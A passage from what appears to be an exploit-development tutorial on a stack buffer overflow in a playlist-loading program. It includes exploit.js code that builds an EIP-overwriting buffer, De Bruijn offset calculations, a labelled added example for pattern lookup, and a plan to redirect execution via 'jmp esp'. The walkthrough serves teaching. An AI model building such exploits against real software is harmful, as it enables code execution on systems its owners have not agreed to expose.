We are effectively making the application crash and overwriting EIP with 0x41414141 (‘AAAA’). That confirms we hit a buffer overflow; now we need to measure the buffer’s length in order to overwrite EIP with whatever value we want. We should try overwriting ESP and EIP with known values.

2nd round

We can try using smaller chunks of bytes to improve our precision. Using chunks 500 bytes long, ESP points to 0x0012EEAC, and the memory there is filled with 0x43 bytes (‘C’s).

Here we can see that ESP points to 0x0012EEAC and that the 0x43 bytes (‘C’s) start 4 addresses before ESP.

So, we have to provide 500 ‘A’s, 500 ‘B’s and 16 ‘C’s in order to reach ESP.

3rd round

We change the block size to 1016 bytes to match our calculations and successfully hit ESP as expected.

We placed 1016 ‘A’s, then 1016 ‘B’s starting at ESP, then 1016 ‘C’s.

Now we need to know how big the stack is. We can measure it with a De Bruijn pattern generated by radare2’s ragg2 utility:

```sh
ragg2 -P 2000 -r
```

4th Round

Our new exploit.js includes a De Bruijn sequence and looks like this:

```javascript
const blockSize = 1012
let buf = ''
buf += 'A'.repeat(blockSize)   // filler up to the saved return address
buf += 'D'.repeat(4)           // overwrites EIP with 0x44444444 ('DDDD')

// Use r2pipe to run ragg2 and append a De Bruijn pattern after EIP,
// so we can later tell how much of the stack past ESP we control
const r2pipe = require('r2pipe')

r2pipe.open("/bin/true", function (err, r2) {
  if (err) {
    console.error(err)
  } else {
    r2.syscmd(`ragg2 -P ${blockSize} -r`, function (err, o) {
      if (err) {
        console.error(err)
      } else {
        buf += o
        r2.quit()
        process.stdout.write(buf)
      }
    })
  }
})
```

Let’s try it out!

Great! EIP = 0x44444444 == ‘DDDD’

Our ‘A’s chunk starts at 0x12EAB4 and EIP is at 0x12EEA8. Using radare2 we can calculate the difference between the two addresses. A third way of finding the stack length would be to provide a De Bruijn pattern directly and then look up the offset of EIP’s value after the crash.

```sh
ragg2 -P 2000 -r > sample.m3u
# this generates a pattern 2000 bytes long
```

After loading this sample.m3u, EIP’s value is 0x41684641, which is at offset 1012 in the pattern, as we would expect:

Then we can calculate where our buffer started on the stack by subtracting this offset from the address where EIP’s value was read, which gives 0x12EAB4 (again, as expected).
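The offset lookup described above, as an added crash-triage example that is not the post’s own code: it builds its own cyclic pattern instead of calling ragg2 (assumptions: an uppercase-only alphabet and order 3, so every 3-byte and hence every 4-byte window is unique; ragg2’s real alphabet and ordering differ, so the 0x41684641 value from the post will not map onto this pattern), converts the little-endian DWORD shown by the debugger back into the bytes as they sat in the file, finds where they occur in the pattern, and derives the buffer start with the post’s own address arithmetic (0x12EEA8 - 1012 = 0x12EAB4). A register value that is not found in the pattern returns -1, which is the signal that the crash is not a clean overwrite from the pattern.

```javascript
// Added example, not the original post's exploit.js.
// Assumed alphabet/order for the De Bruijn pattern (not ragg2's).
const ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
const ORDER = 3; // 26^3 = 17576 bytes before the cyclic pattern repeats

// Standard FKM (Lyndon-word) construction of the De Bruijn sequence B(k, n),
// truncated to `length` bytes. Within the truncated prefix every n-byte
// window is unique, so every 4-byte window (n = 3) is unique too.
function deBruijnPattern(length, alphabet = ALPHABET, n = ORDER) {
  const k = alphabet.length;
  const a = new Array(k * n).fill(0);
  const out = [];
  function db(t, p) {
    if (out.length >= length) return; // enough bytes, stop recursing
    if (t > n) {
      if (n % p === 0) for (let j = 1; j <= p; j++) out.push(a[j]);
    } else {
      a[t] = a[t - p];
      db(t + 1, p);
      for (let j = a[t - p] + 1; j < k; j++) {
        a[t] = j;
        db(t + 1, t);
      }
    }
  }
  db(1, 1);
  return out.slice(0, length).map((i) => alphabet[i]).join('');
}

// The debugger shows EIP as a DWORD (e.g. 0x41684641). x86 is little-endian,
// so the low byte is the one that came first in the file.
function dwordToBytes(value) {
  let s = '';
  for (let i = 0; i < 4; i++) s += String.fromCharCode((value >>> (8 * i)) & 0xff);
  return s;
}

// Offset inside `pattern` of the 4 bytes that landed in the register,
// or -1 if that value did not come from the pattern at all.
function patternOffset(pattern, dword) {
  return pattern.indexOf(dwordToBytes(dword));
}

// Reverse direction: the DWORD a register would show if it were loaded
// from the 4 pattern bytes at `offset` (used here to construct a crash value).
function dwordAtOffset(pattern, offset) {
  let v = 0;
  for (let i = 3; i >= 0; i--) v = (v << 8) | pattern.charCodeAt(offset + i);
  return v >>> 0;
}

// Buffer start = address of the saved return address minus the offset.
function bufferStart(savedEipAddress, offset) {
  return savedEipAddress - offset;
}

// Stand-alone run with the post's numbers; the crash value is constructed
// from this generator's pattern rather than taken from a real debugger.
const pattern = deBruijnPattern(2000);
const crashedEip = dwordAtOffset(pattern, 1012);
const off = patternOffset(pattern, crashedEip);
console.log(`EIP=0x${crashedEip.toString(16)} offset=${off} ` +
  `buffer starts at 0x${bufferStart(0x12eea8, off).toString(16)}`);
```

Order 3 over 26 letters gives a 17576-byte period, which comfortably covers the 2000-byte sample used in the post; raise `ORDER` or widen `ALPHABET` if a larger input is needed, and keep the pattern free of 0x00 and of any byte the target’s parser treats as a terminator.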

In this environment, we can’t place a stack address straight into EIP because stack addresses start with 0x00, a null character that will prevent the rest of the file from being loaded. We need to jump into the portion of the stack containing our payload using an indirect method. We’ll find an address containing the “jmp esp” instruction and overwrite EIP with it.

Finding the address is easy with Immunity Debugger: